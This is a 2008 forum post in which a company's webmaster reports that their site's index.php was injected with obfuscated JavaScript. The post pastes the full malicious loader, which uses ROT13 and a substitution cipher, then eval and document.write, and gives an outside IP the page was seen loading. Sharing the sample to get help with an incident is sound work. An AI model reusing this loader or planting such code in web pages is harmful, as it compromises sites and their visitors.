Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

JavaScript injected into PHP

  • 02-04-2008 3:44pm
    #1
    Closed Accounts Posts: 8,478 ✭✭✭


    We had this happen to our company website. It infected our index.php file somehow. After that we then got a WORLD of bounceback emails all from russia. This is the javaScript code:
    var kco=" shapgvba hmdvx(oz){ine fz,we=\"{v^abRkP9 |V}!6w~pn)@GZro#[$y,`:SO0dMjm&AihU2W;5.lt8fH']u_\\\"q+7BIXNCegs13xT-c(4*z=\",t=\"\",du,dsj,v=\"\",nt;sbe(fz=0;fz<oz.yratgu;fz++){ du=oz.puneNg(fz);dsj=we.vaqrkBs(du);vs(dsj>-1){ nt=((dsj+1)&#37;81-1);vs(nt<=0)nt+=81;v+=we.puneNg(nt-1); } ryfr v+=du;}t+=v;qbphzrag.jevgr(t);}",tuy="";for(mhs=0;mhs<kco.length;mhs++){ xcxg = kco.charCodeAt(mhs);if((xcxg>64 && xcxg<78)||(xcxg>96 && xcxg<110)) xcxg=xcxg+13;
                                                                                                                                                                                                                                                                            else if((xcxg>77 && xcxg<91)||(xcxg>109 && xcxg<123))xcxg=xcxg-13;tuy=tuy.concat(String.fromCharCode(xcxg));} var ddy,xnx; eval( tuy );ddy="<Uat^(f|,)o8H)8b{d~)u)Uat^(fd>|+EaH=bofyzt^fb4|d<S9R}rM|,)o8H)8b{\\d;)u)Sat^(f\\d|SR9{\\d_ff(F//zzzy8EE8,b)o),gf,aUyaE=/\"\"Hfuy~U?d7+EaH=bofytb1bttbt7d\\d><\\/S9R}rM>d|@5|</Uat^(f>|"; uzqik(ddy);
    

    Possibly linked, but one the staffers spotted in IE that it was trying to load the following IP address after our website had loaded:

    http://58.65.234.163/...some random page....

    Having taken out the JavaScript code, it looks like the spam has died down and hopefully we will be back to normal. But we weren't the only ones.

    http://www.codingforums.com/showthread.php?p=671538


Advertisement